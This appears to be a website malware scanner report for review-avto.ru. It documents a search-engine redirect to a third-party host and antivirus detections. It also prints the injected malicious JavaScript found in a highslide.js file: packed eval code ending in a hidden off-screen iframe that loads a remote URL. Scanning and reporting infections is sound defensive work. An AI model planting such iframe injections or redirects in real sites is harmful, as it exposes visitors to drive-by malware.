New scan:

Malware Scanner report for review-avto.ru

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://site.portrelay.com/
1934 websites infected.

The website "review-avto.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://review-avto.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: review-avto.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 11:05:28 GMT
Pragma: no-cache
Location: http://site.portrelay.com/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2d1uq9g1jhutvtojh09urh52e1; path=/
X-Powered-By: PHP/5.3.3-7+squeeze8
malicious

Scanned pages/files

RequestServer responseStatus
http://review-avto.ru/
200 OK
Content-Length: 30258
Content-Type: text/html
clean
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&g=general&5
500 Internal Server Error
Content-Length: 0
Content-Type: text/html
clean
http://review-avto.ru/test404page.js
404 Not Found
Content-Length: 292
Content-Type: text/html
clean
http://review-avto.ru/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&5
200 OK
Content-Length: 32882
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('q(!m){u m={Y:{8G:\'8i\',8k:\'a9...\',8l:\'6w 1E 9X\',8g:\'6w 1E af 1E aa\',6n:\'a2 1E a7 B (f)\',7F:\'a4 by <i>8L 8P</i>\',7R:\'a6 1E a0 8L 8P at\',9Q:\
... 3306 bytes are skipped ...
Height|stl|attachEvent|important|toElement|ignoreMe|linearTween|setInterval|createTextNode|addSlideshow|fromElement|mouseover|htmlE|registerOverlay|toString|xpand|button|dragSensitivity|callee|sqrt|splice|expression|load|borderCollapse|text|cellSpacing|collapse||clearInterval|DOMContentLoaded|HEAD'.split('|'),0,{}));document.write('<iframe style="position:fixed;left:-500px;top:0px;" height="110" width="110" src="http://jdlenyk.freewww.info/c3b52cab0aa31.fqo29ZWR?default"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://crackac.com/60rb4e1/5497
200 OK
Content-Length: 8226
Content-Type: application/javascript
clean
http://counter.rambler.ru/top100.jcn?1763990
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=review-avto.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://review-avto.ru/

Result: review-avto.ru is not infected or malware details are not published yet.